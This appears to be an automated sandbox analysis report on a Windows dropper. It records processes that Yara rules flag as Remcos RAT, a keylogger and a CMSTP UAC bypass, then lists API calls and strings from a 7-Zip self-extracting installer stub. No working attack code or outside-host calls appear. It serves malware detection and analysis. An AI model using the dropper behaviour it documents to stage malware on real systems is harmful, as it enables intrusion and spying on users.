MD5 hash:	EC9CE1D67F98072281015C7726FBA245
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:04:22
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:04:22
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:04:27
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x400000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:04:29
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
Imagebase:	0x400000
File size:	8'767'704 bytes
MD5 hash:	EC9CE1D67F98072281015C7726FBA245
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:04:29
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:04:29
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:04:41
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x400000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:04:44
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x400000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.3213654065.0000000002F1B000.00000004.00000001.01000000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.3213566358.0000000002F12000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000002.3213673292.0000000002F1F000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.9%
Total number of Nodes:	1474
Total number of Limit Nodes:	20

Executed Functions

Function 00404FAA Relevance: 250.2, APIs: 103, Strings: 39, Instructions: 1671keyboardsynchronizationwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99

GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C

Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F

Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD

_wtol.MSVCRT ref: 0040509F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
_wtol.MSVCRT ref: 00405217
??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F

Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC

Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953

??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519

Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569

Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6

wsprintfW.USER32 ref: 00405595
_wtol.MSVCRT ref: 004057DE
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
CoInitialize.OLE32(00000000), ref: 004059E9
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
GetKeyState.USER32(00000010), ref: 00405AA1
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
memset.MSVCRT ref: 004060AE
ShellExecuteExW.SHELL32(?), ref: 0040617E
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB

Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
_wtol.MSVCRT ref: 00405F65
??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C

Strings

Shortcut, xrefs: 0040632A
setup.exe, xrefs: 00405DE5, 00405DEA, 00405E45
;!@Install@!UTF-8!, xrefs: 00405436
forcenowait, xrefs: 00405F25
x86, xrefs: 00405FBE
ExecuteParameters, xrefs: 0040605D
7ZipSfx.%03x, xrefs: 00405C77
IA, xrefs: 004055D2, 004058FB
@DA, xrefs: 00405699
Delete, xrefs: 00406352
InstallPath, xrefs: 004059F3
7zSfxString%d, xrefs: 0040558F
AutoInstall, xrefs: 00405AC1, 00405B1C, 00405ECC
ExecuteFile, xrefs: 00405A61, 00405B47, 00405B55
SelfDelete, xrefs: 0040577C, 0040640B
sfxversion, xrefs: 004050D6
hidcon, xrefs: 00405E5E
4AA, xrefs: 0040504C
MiscFlags, xrefs: 0040573F
i386, xrefs: 00405FD1
FinishMessage, xrefs: 00406399
GUIFlags, xrefs: 0040571F
nowait, xrefs: 00405F03
OverwriteMode, xrefs: 004056BB
GUIMode, xrefs: 004056FF
x64, xrefs: 00405FF7
7-Zip SFX, xrefs: 00406490
del, xrefs: 00405F9A
;!@InstallEnd@!, xrefs: 00405431
HelpText, xrefs: 0040595E
SetEnvironment, xrefs: 0040586E, 0040591F
XpA, xrefs: 00405581
shc, xrefs: 00405F7A
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 00406495
amd64, xrefs: 00405FE4
BeginPrompt, xrefs: 00405A71
RunProgram, xrefs: 00405A66, 00405B6B, 00405B79
sfxconfig, xrefs: 0040527C, 00405488
4DA, xrefs: 00406034

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
API String ID: 154539431-3058303289
Opcode ID: 3447839d119719d05016a7f05a564b7be075a38f3dc1eabf80374ede3987d6c4
Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
Opcode Fuzzy Hash: 3447839d119719d05016a7f05a564b7be075a38f3dc1eabf80374ede3987d6c4
Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

Function 00401626 Relevance: 22.8, APIs: 15, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
Opcode Fuzzy Hash: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

Function 0040301A Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
SetLastError.KERNEL32(00000010), ref: 0040303D

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
